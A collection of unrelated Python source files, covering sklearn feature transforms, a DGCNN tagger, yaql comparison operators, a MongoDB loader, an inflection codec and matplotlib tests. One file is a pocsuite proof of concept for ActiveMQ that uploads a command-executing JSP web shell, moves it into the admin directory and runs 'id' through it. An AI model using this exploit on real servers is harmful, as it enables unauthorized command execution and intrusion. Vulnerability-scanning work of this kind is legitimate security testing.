# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Define the TruncatedSVD transformation based on the training data
svd = TruncatedSVD(n_components=5, random_state=71)
svd.fit(train_x)
# Apply the transformation
train_x = svd.transform(train_x)
test_x = svd.transform(test_x)
# -----------------------------------
# NMF
# -----------------------------------
# Use Min-Max scaled data so that the values are non-negative
train_x, test_x = load_minmax_scaled_data()
# -----------------------------------
from sklearn.decomposition import NMF
# The data is assumed to consist of non-negative values
# Define the NMF transformation based on the training data
model = NMF(n_components=5, init='random', random_state=71)
model.fit(train_x)
# Apply the transformation
train_x = model.transform(train_x)
test_x = model.transform(test_x)
# -----------------------------------
# LatentDirichletAllocation
# -----------------------------------
# Use Min-Max scaled data
# Not a count matrix, but the computation works as long as the values are non-negative
train_x, test_x = load_minmax_scaled_data()
# -----------------------------------
from sklearn.decomposition import LatentDirichletAllocation
# The data is assumed to be something like a word-document count matrix
# Define the LDA transformation based on the training data
model = LatentDirichletAllocation(n_components=5, random_state=71)
model.fit(train_x)
# Apply the transformation
train_x = model.transform(train_x)
test_x = model.transform(test_x)
# -----------------------------------
# LinearDiscriminantAnalysis
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Define the linear discriminant analysis transformation based on the training data
lda = LDA(n_components=1)
lda.fit(train_x, train_y)
# Apply the transformation
train_x = lda.transform(train_x)
test_x = lda.transform(test_x)
# -----------------------------------
# t-sne
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
import bhtsne
# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Transformation by t-SNE
data = pd.concat([train_x, test_x])
embedded = bhtsne.tsne(data.astype(np.float64), dimensions=2, rand_seed=71)
# -----------------------------------
# UMAP
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
import umap
# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Define the UMAP transformation based on the training data
um = umap.UMAP()
um.fit(train_x)
# Apply the transformation
train_x = um.transform(train_x)
test_x = um.transform(test_x)
# -----------------------------------
# Clustering
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
from sklearn.cluster import MiniBatchKMeans
# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Define Mini-Batch K-Means clustering based on the training data
kmeans = MiniBatchKMeans(n_clusters=10, random_state=71)
kmeans.fit(train_x)
# Output the cluster each sample belongs to
train_clusters = kmeans.predict(train_x)
test_clusters = kmeans.predict(test_x)
# Output the distance to each cluster center
train_distances = kmeans.transform(train_x)
test_distances = kmeans.transform(test_x)
|
macadam/sl/s04_dgcnn.py
|
yongzhuo/Macadam
| 290 |
129455
|
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/12 22:46
# @author : Mo
# @function: DGCNN (Dilate Gated Convolutional Neural Network, i.e. a dilated gated CNN, IDCNN + CRF)
# @url : Multi-Scale Context Aggregation by Dilated Convolutions(https://arxiv.org/abs/1511.07122)
from bert4keras.layers import ConditionalRandomField
from macadam import keras, K, O, C, L, M
from macadam.base.graph import graph
class DGCNNGraph(graph):
def __init__(self, hyper_parameters):
"""
Init of hyper_parameters and build_embed.
Args:
hyper_parameters: hyper_parameters of all, which contains "sharing", "embed", "graph", "train", "save" and "data".
Returns:
None
"""
super().__init__(hyper_parameters)
self.atrous_rates = hyper_parameters["graph"].get("atrous_rates", [2, 1, 2]) # 1, 2, 3
self.crf_lr_multiplier = hyper_parameters.get("train", {}).get("crf_lr_multiplier",
1 if self.embed_type in ["WARD", "RANDOM"] else 3200)
def build_model(self, inputs, outputs):
"""
build_model.
Args:
inputs: tensor, input of model
outputs: tensor, output of model
Returns:
None
"""
        # CNN: extract n-gram features with max pooling, DGCNN dilated convolution (IDCNN)
conv_pools = []
for i in range(len(self.filters_size)):
conv = L.Conv1D(name="conv-{0}-{1}".format(i, self.filters_size[i]),
dilation_rate=self.atrous_rates[0],
kernel_size=self.filters_size[i],
activation=self.activate_mid,
filters=self.filters_num,
padding="SAME",
)(outputs)
for j in range(len(self.atrous_rates) - 1):
conv = L.Conv1D(name="conv-{0}-{1}-{2}".format(i, self.filters_size[i], j),
dilation_rate=self.atrous_rates[j],
kernel_size=self.filters_size[i],
activation=self.activate_mid,
filters=self.filters_num,
padding="SAME",
)(conv)
conv = L.Dropout(name="dropout-{0}-{1}-{2}".format(i, self.filters_size[i], j),
rate=self.dropout,)(conv)
conv_pools.append(conv)
        # Concatenate
x = L.Concatenate(axis=-1)(conv_pools)
x = L.Dropout(self.dropout)(x)
# CRF or Dense
if self.use_crf:
x = L.Dense(units=self.label, activation=self.activate_end)(x)
self.CRF = ConditionalRandomField(self.crf_lr_multiplier, name="crf_bert4keras")
self.outputs = self.CRF(x)
self.trans = K.eval(self.CRF.trans).tolist()
self.loss = self.CRF.dense_loss if self.use_onehot else self.CRF.sparse_loss
self.metrics = [self.CRF.dense_accuracy if self.use_onehot else self.CRF.sparse_accuracy]
else:
x = L.Bidirectional(L.GRU(activation=self.activate_mid,
return_sequences=True,
units=self.rnn_unit,
name="bi-gru",)
)(x)
self.outputs = L.TimeDistributed(L.Dense(activation=self.activate_end,
name="dense-output",
units=self.label,))(x)
self.model = M.Model(inputs, self.outputs)
self.model.summary(132)
|
plynx/base/resource.py
|
khaxis/plynx
| 137 |
129463
|
"""Templates for PLynx Resources and utils."""
from collections import namedtuple
from typing import Dict
from plynx.constants import NodeResources
PreviewObject = namedtuple('PreviewObject', ['fp', 'resource_id'])
def _force_decode(byte_array):
    try:
        return byte_array.decode("utf-8")
    except UnicodeDecodeError:
        return f"# not a UTF-8 sequence:\n{byte_array}"
class BaseResource:
"""Base Resource class"""
DISPLAY_RAW: bool = False
def __init__(self):
pass
@staticmethod
def prepare_input(filename: str, preview: bool = False) -> Dict[str, str]: # pylint: disable=unused-argument
"""Resource preprocessor"""
return {NodeResources.INPUT: filename}
@staticmethod
def prepare_output(filename: str, preview: bool = False) -> Dict[str, str]:
"""Prepare output"""
if not preview:
# Create file
with open(filename, 'a'):
pass
return {NodeResources.OUTPUT: filename}
@staticmethod
def postprocess_output(filename: str) -> str:
"""Resource postprocessor"""
return filename
@classmethod
def preview(cls, preview_object: PreviewObject) -> str:
"""Preview Resource"""
# TODO escape html code for security reasons
data = _force_decode(preview_object.fp.read())
return f"<pre>{data}</pre>"
|
yaql/standard_library/common.py
|
nzlosh/yaql
| 112 |
129467
|
<reponame>nzlosh/yaql
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common module describes comparison operators for different types. Comparing
with null value is considered separately.
"""
from yaql.language import specs
@specs.name('*equal')
def eq(left, right):
""":yaql:operator =
Returns true if left and right are equal, false otherwise.
    It is a system function and can be used to override the behavior
    of comparison between objects.
"""
return left == right
@specs.name('*not_equal')
def neq(left, right):
""":yaql:operator !=
Returns true if left and right are not equal, false otherwise.
    It is a system function and can be used to override the behavior
    of comparison between objects.
"""
return left != right
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<')
def left_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left is not null and
right is null.
:signature: left < right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 < null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<=')
def left_lte_null(left, right):
""":yaql:operator <=
Returns false. This function is called when left is not null
and right is null.
:signature: left <= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 <= null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>')
def left_gt_null(left, right):
""":yaql:operator >
Returns true. This function is called when left is not null
and right is null.
:signature: left > right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 > null
true
"""
return True
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>=')
def left_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left is not null
and right is null.
:signature: left >= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 >= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<')
def null_lt_right(left, right):
""":yaql:operator <
Returns true. This function is called when left is null and
right is not.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null < 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<=')
def null_lte_right(left, right):
""":yaql:operator <=
Returns true. This function is called when left is null and
right is not.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null <= 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>')
def null_gt_right(left, right):
""":yaql:operator >
Returns false. This function is called when left is null and right
is not.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null > 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>=')
def null_gte_right(left, right):
""":yaql:operator >=
Returns false. This function is called when left is null and
right is not.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null >= 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<')
def null_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left and right are null.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null < null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<=')
def null_lte_null(left, right):
""":yaql:operator <=
Returns true. This function is called when left and right are null.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null <= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>')
def null_gt_null(left, right):
""":yaql:operator >
Returns false. This function is called when left and right are null.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null > null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>=')
def null_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left and right are null.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null >= null
true
"""
return True
def register(context):
context.register_function(eq)
context.register_function(neq)
context.register_function(left_lt_null)
context.register_function(left_lte_null)
context.register_function(left_gt_null)
context.register_function(left_gte_null)
context.register_function(null_lt_right)
context.register_function(null_lte_right)
context.register_function(null_gt_right)
context.register_function(null_gte_right)
context.register_function(null_lt_null)
context.register_function(null_lte_null)
context.register_function(null_gt_null)
context.register_function(null_gte_null)
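

# --- Hedged usage sketch (not shipped with yaql) ---
# Illustrates the null-comparison semantics defined above by calling the
# operator implementations directly; in real use the yaql engine dispatches
# to them after register() has added them to a context.
if __name__ == '__main__':
    print(null_lt_right(None, 2))     # True:  null < 2
    print(left_gt_null(1, None))      # True:  1 > null
    print(null_gte_null(None, None))  # True:  null >= null
    print(eq(None, None))             # True:  null = null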
|
vul/32-ActiveMQ-unauthorized-access.py
|
zx273983653/vulscan
| 582 |
129476
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# command-line mode
from pocsuite import pocsuite_cli
# verification module
from pocsuite import pocsuite_verify
# attack module
from pocsuite import pocsuite_attack
# console mode
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class ActiveMQPOC(POCBase):
    vulID = '32' # ssvid ID; use 0 if the PoC is submitted together with the vulnerability report
    version = '1' # defaults to 1
    vulDate = '2018-06-05' # date the vulnerability was disclosed; use today's date if unknown
    author = 'arr0w1' # PoC author
    createDate = '2018-06-05'# date the PoC was written
    updateDate = '2018-06-05'# date the PoC was last updated; defaults to the creation date
    references = 'https://help.aliyun.com/knowledge_detail/50436.html'# source of the vulnerability report; leave empty for 0-days
    name = 'ActiveMQ Unauthorized access'# PoC name
    appPowerLink = ''# vendor homepage
    appName = 'ActiveMQ'# affected application name
    appVersion = 'all versions'# affected versions
    vulType = 'Command Execution'# vulnerability type; see the vulnerability type reference table
desc = '''
        ActiveMQ unauthorized access vulnerability
    ''' # brief description of the vulnerability
    samples = []# test samples, i.e. sites where the PoC has been verified successfully
    install_requires = [] # third-party module dependencies of the PoC; avoid third-party modules where possible (see the PoC dependency guidelines)
cvss = u"严重" #严重,高危,中危,低危
    # Verify the vulnerability: pocsuite -r 32-ActiveMQ-unauthorized-access.py -u 127.0.0.1 --verify
def _verify(self):
        # define the return result
return self._attack()
    # exploit the vulnerability
def _attack(self):
        # define the return result
result = {}
        # get the vulnerable URL
vul_url = '%s' % self.url
        # use the specified port if there is one, otherwise fall back to the default port
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = '8161'
        # check for the vulnerability
url = 'http://%s:%s'%(_host,_port)
# print url
try:
get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
res = req.put(url=get_fileserver_path_url, timeout=5, allow_redirects=False)
# print res.reason
path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0]
# print path
put_jsp_url = url + '/fileserver/haha.jsp'
jsp_data = '''
<%
if("sec".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
'''
res = req.put(url=put_jsp_url, timeout=5, allow_redirects=False, data = jsp_data)
if res.status_code == 204:
# print 'ok'
headers = {
'Destination': 'file://'+path+'admin/haha.jsp'
}
res = req.request('move', url=put_jsp_url, timeout=5, allow_redirects=False, headers=headers)
if res.status_code == 204:
# print 'ok'
exploit_url = url + '/admin/haha.jsp?pwd=<PASSWORD>&i=id'
res = req.get(url=exploit_url, timeout=5, allow_redirects=False)
if 'uid' in res.text:
id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
print id_info
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = exploit_url
except Exception as e:
print e
return self.save_output(result)
def save_output(self, result):
        # check whether there is a result and report it
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(ActiveMQPOC)
|
app/master/subjob.py
|
rsennewald/ClusterRunner
| 164 |
129502
|
import os
from typing import List
from app.common.build_artifact import BuildArtifact
from app.master.atom import AtomState
from app.util.conf.configuration import Configuration
from app.util.log import get_logger
from app.util.pagination import get_paginated_indices
class Subjob(object):
def __init__(self, build_id, subjob_id, project_type, job_config, atoms):
"""
:param build_id:
:type build_id: int
:param subjob_id:
:type subjob_id: int
:param project_type:
:type project_type: ProjectType
:param job_config: the job's configuration from clusterrunner.yaml
:type job_config: JobConfig
:param atoms: the atom project_type strings
:type atoms: list[app.master.atom.Atom]
:return:
"""
self._logger = get_logger(__name__)
self._build_id = build_id
self._subjob_id = subjob_id
self._project_type = project_type # todo: Unused; remove.
self.job_config = job_config
self._atoms = atoms
self._set_atoms_subjob_id(atoms, subjob_id)
self._set_atom_state(AtomState.NOT_STARTED)
self.timings = {} # a dict, atom_ids are the keys and seconds are the values
self.slave = None # The slave that had been assigned this subjob. Is None if not started.
def __str__(self):
return '<subjob {} of build {}>'.format(self._subjob_id, self._build_id)
def _set_atoms_subjob_id(self, atoms, subjob_id):
"""
Set the subjob_id on each atom
:param atoms: an array of atoms to set the subjob_id on
:type atoms: list[app.master.atom.Atom]
:param subjob_id: the subjob_id to set on the atoms
:type subjob_id: int
"""
for atom in atoms:
atom.subjob_id = subjob_id
def _set_atom_state(self, state):
"""
Set the state of all atoms of the subjob.
:param state: up-to-date state of all atoms of the subjob
:type state: `:class:AtomState`
"""
for atom in self._atoms:
atom.state = state
def mark_in_progress(self, slave):
"""
Mark the subjob IN_PROGRESS, which marks the state of all the atoms of the subjob IN_PROGRESS.
:param slave: the slave node that has been assigned this subjob.
:type slave: Slave
"""
self._set_atom_state(AtomState.IN_PROGRESS)
self.slave = slave
def mark_completed(self):
"""
Mark the subjob COMPLETED, which marks the state of all the atoms of the subjob COMPLETED.
"""
self._set_atom_state(AtomState.COMPLETED)
def api_representation(self):
"""
:rtype: dict [str, str]
"""
return {
'id': self._subjob_id,
'command': self.job_config.command,
'atoms': [atom.api_representation() for atom in self._atoms],
'slave': self.slave.url if self.slave else None,
}
@property
def atoms(self) -> List['Atom']:
"""
Returns a list of all atoms for this subjob
"""
return self._atoms
def get_atoms(self, offset: int=None, limit: int=None) -> List['Atom']:
"""
Returns a list of atoms for this subjob
:param offset: The starting index of the requested build
:param limit: The number of builds requested
:rtype: list[app.master.atom.Atom]
"""
num_atoms = len(self._atoms)
start, end = get_paginated_indices(offset, limit, num_atoms)
return self._atoms[start:end]
def build_id(self):
"""
:return:
:rtype: int
"""
return self._build_id
def subjob_id(self):
"""
:return:
:rtype: int
"""
return self._subjob_id
def atomic_commands(self):
"""
The list of atom commands -- the atom id for each atom is implicitly defined by the index of the list.
:rtype: list[str]
"""
job_command = self.job_config.command
return ['{} {}'.format(atom.command_string, job_command) for atom in self._atoms]
def add_timings(self, timings):
"""
Add timing data for this subjob's atoms, collected from a slave
:param timings:
:type timings: dict [string, float]
"""
self.timings.update(timings)
def read_timings(self):
"""
The timing data for each atom should be stored in the atom directory. Parse them, associate
them with their atoms, and return them.
:rtype: dict [str, float]
"""
timings = {}
for atom_id, atom in enumerate(self._atoms):
artifact_dir = BuildArtifact.atom_artifact_directory(
self.build_id(),
self.subjob_id(),
atom_id,
result_root=Configuration['results_directory']
)
timings_file_path = os.path.join(artifact_dir, BuildArtifact.TIMING_FILE)
if os.path.exists(timings_file_path):
with open(timings_file_path, 'r') as f:
atom.actual_time = float(f.readline())
timings[atom.command_string] = atom.actual_time
else:
self._logger.warning('No timing data for subjob {} atom {}.',
self._subjob_id, atom_id)
if len(timings) == 0:
self._logger.warning('No timing data for subjob {}.', self._subjob_id)
return timings
|
data/databases/create_dataset_from_mongodb_collection.py
|
james94/driverlessai-recipes
| 194 |
129527
|
"""Create dataset from MonogDB"""
# Author: <NAME>
# Created: 31/01/2020
# Last Updated: 20/02/2020
import datatable as dt
import pandas as pd
from h2oaicore.data import CustomData
_global_modules_needed_by_name = ["pymongo", "dnspython"]
# Please fill before usage
# Note that this information is logged in Driverless AI logs.
MONGO_CONNECTION_STRING = "mongodb+srv://<username>:<password>@host[/[database][?options]]"
MONGO_DB = "sample_mflix"
MONGO_COLLECTION = "theaters"
DATASET_NAME = "sample_mflix.theaters"
class MongoDbData(CustomData):
_modules_needed_by_name = ["pymongo", "dnspython"]
@staticmethod
def create_data(X: dt.Frame = None):
from pymongo import MongoClient
        # Note: the try clause is added to help pass tests internally. It can have the
        # unexpected effect of the recipe completing successfully but returning an empty dataset.
try:
# Initialize MongoDB python client
client = MongoClient(MONGO_CONNECTION_STRING)
# Use MongoDB python client to obtain list of all documents in a specific database + collection
db = client.get_database(MONGO_DB)
coll = db.get_collection(MONGO_COLLECTION)
docs = coll.find()
# Convert MongoDB documents cursor to pandas dataframe
df = pd.DataFrame.from_dict(docs)
# Cast all object columns as string since datatable cannot accept arbitrary objects
object_cols = df.select_dtypes(include=['object']).columns
df[object_cols] = df[object_cols].astype(str)
# return dict where key is name of dataset and value is a datatable Frame of the data.
return {DATASET_NAME: dt.Frame(df)}
except Exception as e:
return []
|
lemminflect/codecs/InflectionLUCodec.py
|
danielplatt/LemmInflect
| 157 |
129534
|
<filename>lemminflect/codecs/InflectionLUCodec.py
import gzip
from ..slexicon.SKey import *
# Helper class for reading/writing lookup csv file
class InflectionLUCodec(object):
# SPECIALIST LEXICON keys, used for writing
    # This represents the order of the forms written to lu.csv in SLexicon key terms
slex_dict = {}
slex_dict[SKey.NOUN] = [SKey.PLURAL]
slex_dict[SKey.ADJ] = [SKey.COMPARATIVE, SKey.SUPERLATIVE]
slex_dict[SKey.ADV] = [SKey.COMPARATIVE, SKey.SUPERLATIVE]
slex_dict[SKey.VERB] = [SKey.PAST, SKey.PAST_PART, SKey.PRES_PART, SKey.THIRD_PRES]
#slex_dict[SKey.AUX] = [SKey.PAST, SKey.PAST_PART, SKey.PRES_PART, SKey.THIRD_PRES]
#slex_dict[SKey.MODAL] = [SKey.PAST]
# Penn treebank tags, used for reading.
# This represents the order of forms read from lu.csv in Penn tag terms
penn_dict = {}
penn_dict[SKey.NOUN] = ['NNS'] # base is SINGULAR = NN
penn_dict[SKey.ADJ] = ['JJR', 'JJS'] # base is POSITIVE = JJ
penn_dict[SKey.ADV] = ['RBR', 'RBS'] # base is POSITIVE = RB
    penn_dict[SKey.VERB] = ['VBD', 'VBN', 'VBG', 'VBZ'] # base is INFINITIVE = VB, VBP
#penn_dict[SKey.AUX] = ['VBD', 'VBN', 'VBG', 'VBZ'] # will be overridden below
#penn_dict[SKey.MODAL] = ['VBD'] # will be overridden below
@classmethod
def toString(cls, word, category, forms_dict):
forms_str = ''
for ftype in cls.slex_dict[category]:
for spelling in forms_dict.get(ftype,[]):
forms_str += '%s/' % spelling
if forms_str.endswith('/'):
forms_str = forms_str[:-1]
forms_str += ','
if forms_str.endswith(','):
forms_str = forms_str[:-1]
line = '%s,%s,%s\n' % (word, category, forms_str)
return line
@classmethod
def fromString(cls, line):
parts = line.strip().split(',')
word = parts[0]
category = parts[1]
forms = parts[2:]
forms_dict = {}
for i, ftype in enumerate(cls.penn_dict[category]):
if i < len(forms):
spellings = tuple(forms[i].split('/'))
if len(spellings)>1 or spellings[0]: # empty produces ('',)
forms_dict[ftype] = spellings
# update for base forms
if category == SKey.NOUN:
forms_dict['NN'] = (word,)
elif category == SKey.ADJ:
forms_dict['JJ'] = (word,)
elif category == SKey.ADV:
forms_dict['RB'] = (word,)
elif category in [SKey.VERB]:
forms_dict['VB'] = (word,)
forms_dict['VBP'] = (word,)
# Don't read aux and modal from the look-up. Get them later
elif category in [SKey.AUX, SKey.MODAL]:
forms_dict['VB'] = (word,)
else:
raise ValueError('Unrecognized category: %s' % category)
return word, category, forms_dict
# Load inflections_lu.csv
@classmethod
def load(cls, fn):
infl_dict = {}
with gzip.open(fn, 'rb') as f:
for line in f:
line = line.decode()
word, _, forms_dict = cls.fromString(line)
if word not in infl_dict:
infl_dict[word] = forms_dict
else:
infl_dict[word].update(forms_dict)
# Update the dictionary with hard-coded values for aux and modals.
infl_dict = cls.updateForAuxMod(infl_dict)
return infl_dict
    # On reading, hard-code aux/modals since they don't follow the rules very well
# This will override any previously read in values
@staticmethod
def updateForAuxMod(d):
        # Modal auxiliary verbs
d['can'] = {'VB':('can',), 'VBD':('could',)}
d['may'] = {'VB':('may',), 'VBD':('might',)}
d['will'] = {'VB':('will',), 'VBD':('would',)}
d['shall'] = {'VB':('shall',), 'VBD':('should',)}
d['must'] = {'VB':('must',), 'VBD':('must',)}
d['ought'] = {'VB':('ought',), 'VBD':('ought',)}
d['dare'] = {'VB':('dare',)}
        # Auxiliary verbs
d['be'] = {'VB':('be',), 'VBD':('was', 'were'), 'VBG':('being',), 'VBN':('been',),
'VBP':('am', 'are'), 'VBZ':('is',)}
return d
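

# --- Hedged usage sketch (not part of the original module) ---
# Round-trips one illustrative verb through the csv codec to show the line
# format: SPECIALIST-keyed forms go in via toString() and come back out keyed
# by Penn tags via fromString(). The word "walk" and its forms are example
# data, not entries from the shipped lookup table.
if __name__ == '__main__':
    forms = {
        SKey.PAST: ('walked',),
        SKey.PAST_PART: ('walked',),
        SKey.PRES_PART: ('walking',),
        SKey.THIRD_PRES: ('walks',),
    }
    line = InflectionLUCodec.toString('walk', SKey.VERB, forms)
    print(line.strip())                  # e.g. walk,verb,walked,walked,walking,walks
    word, category, penn_forms = InflectionLUCodec.fromString(line)
    print(word, category, penn_forms)    # Penn-tag keyed forms, including base VB/VBP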
|
venv/Lib/site-packages/matplotlib/tests/test_mlab.py
|
AdarshSai/Final_project
| 353 |
129542
|
from numpy.testing import (assert_allclose, assert_almost_equal,
assert_array_equal, assert_array_almost_equal_nulp)
import numpy as np
import pytest
import matplotlib.mlab as mlab
from matplotlib.cbook.deprecation import MatplotlibDeprecationWarning
def _stride_repeat(*args, **kwargs):
with pytest.warns(MatplotlibDeprecationWarning):
return mlab.stride_repeat(*args, **kwargs)
class TestStride:
def get_base(self, x):
y = x
while y.base is not None:
y = y.base
return y
def calc_window_target(self, x, NFFT, noverlap=0, axis=0):
"""
This is an adaptation of the original window extraction algorithm.
This is here to test to make sure the new implementation has the same
result.
"""
step = NFFT - noverlap
ind = np.arange(0, len(x) - NFFT + 1, step)
n = len(ind)
result = np.zeros((NFFT, n))
# do the ffts of the slices
for i in range(n):
result[:, i] = x[ind[i]:ind[i]+NFFT]
if axis == 1:
result = result.T
return result
@pytest.mark.parametrize('shape', [(), (10, 1)], ids=['0D', '2D'])
def test_stride_windows_invalid_input_shape(self, shape):
x = np.arange(np.prod(shape)).reshape(shape)
with pytest.raises(ValueError):
mlab.stride_windows(x, 5)
@pytest.mark.parametrize('n, noverlap',
[(0, None), (11, None), (2, 2), (2, 3)],
ids=['n less than 1', 'n greater than input',
'noverlap greater than n',
'noverlap equal to n'])
def test_stride_windows_invalid_params(self, n, noverlap):
x = np.arange(10)
with pytest.raises(ValueError):
mlab.stride_windows(x, n, noverlap)
@pytest.mark.parametrize('shape', [(), (10, 1)], ids=['0D', '2D'])
def test_stride_repeat_invalid_input_shape(self, shape):
x = np.arange(np.prod(shape)).reshape(shape)
with pytest.raises(ValueError):
_stride_repeat(x, 5)
@pytest.mark.parametrize('axis', [-1, 2],
ids=['axis less than 0',
'axis greater than input shape'])
def test_stride_repeat_invalid_axis(self, axis):
x = np.array(0)
with pytest.raises(ValueError):
_stride_repeat(x, 5, axis=axis)
def test_stride_repeat_n_lt_1_ValueError(self):
x = np.arange(10)
with pytest.raises(ValueError):
_stride_repeat(x, 0)
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
@pytest.mark.parametrize('n', [1, 5], ids=['n1', 'n5'])
def test_stride_repeat(self, n, axis):
x = np.arange(10)
y = _stride_repeat(x, n, axis=axis)
expected_shape = [10, 10]
expected_shape[axis] = n
yr = np.repeat(np.expand_dims(x, axis), n, axis=axis)
assert yr.shape == y.shape
assert_array_equal(yr, y)
assert tuple(expected_shape) == y.shape
assert self.get_base(y) is x
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
@pytest.mark.parametrize('n, noverlap',
[(1, 0), (5, 0), (15, 2), (13, -3)],
ids=['n1-noverlap0', 'n5-noverlap0',
'n15-noverlap2', 'n13-noverlapn3'])
def test_stride_windows(self, n, noverlap, axis):
x = np.arange(100)
y = mlab.stride_windows(x, n, noverlap=noverlap, axis=axis)
expected_shape = [0, 0]
expected_shape[axis] = n
expected_shape[1 - axis] = 100 // (n - noverlap)
yt = self.calc_window_target(x, n, noverlap=noverlap, axis=axis)
assert yt.shape == y.shape
assert_array_equal(yt, y)
assert tuple(expected_shape) == y.shape
assert self.get_base(y) is x
@pytest.mark.parametrize('axis', [0, 1], ids=['axis0', 'axis1'])
def test_stride_windows_n32_noverlap0_unflatten(self, axis):
n = 32
x = np.arange(n)[np.newaxis]
x1 = np.tile(x, (21, 1))
x2 = x1.flatten()
y = mlab.stride_windows(x2, n, axis=axis)
if axis == 0:
x1 = x1.T
assert y.shape == x1.shape
assert_array_equal(y, x1)
def test_stride_ensure_integer_type(self):
N = 100
x = np.full(N + 20, np.nan)
y = x[10:-10]
y[:] = 0.3
        # prior to #3845 this led to corrupt access
y_strided = mlab.stride_windows(y, n=33, noverlap=0.6)
assert_array_equal(y_strided, 0.3)
        # prior to #3845 this led to corrupt access
y_strided = mlab.stride_windows(y, n=33.3, noverlap=0)
assert_array_equal(y_strided, 0.3)
        # even prior to #3845 we could not find any problematic
        # configuration; however, let's be sure it's not accidentally
        # introduced
y_strided = _stride_repeat(y, n=33.815)
assert_array_equal(y_strided, 0.3)
def _apply_window(*args, **kwargs):
with pytest.warns(MatplotlibDeprecationWarning):
return mlab.apply_window(*args, **kwargs)
class TestWindow:
def setup(self):
np.random.seed(0)
n = 1000
self.sig_rand = np.random.standard_normal(n) + 100.
self.sig_ones = np.ones(n)
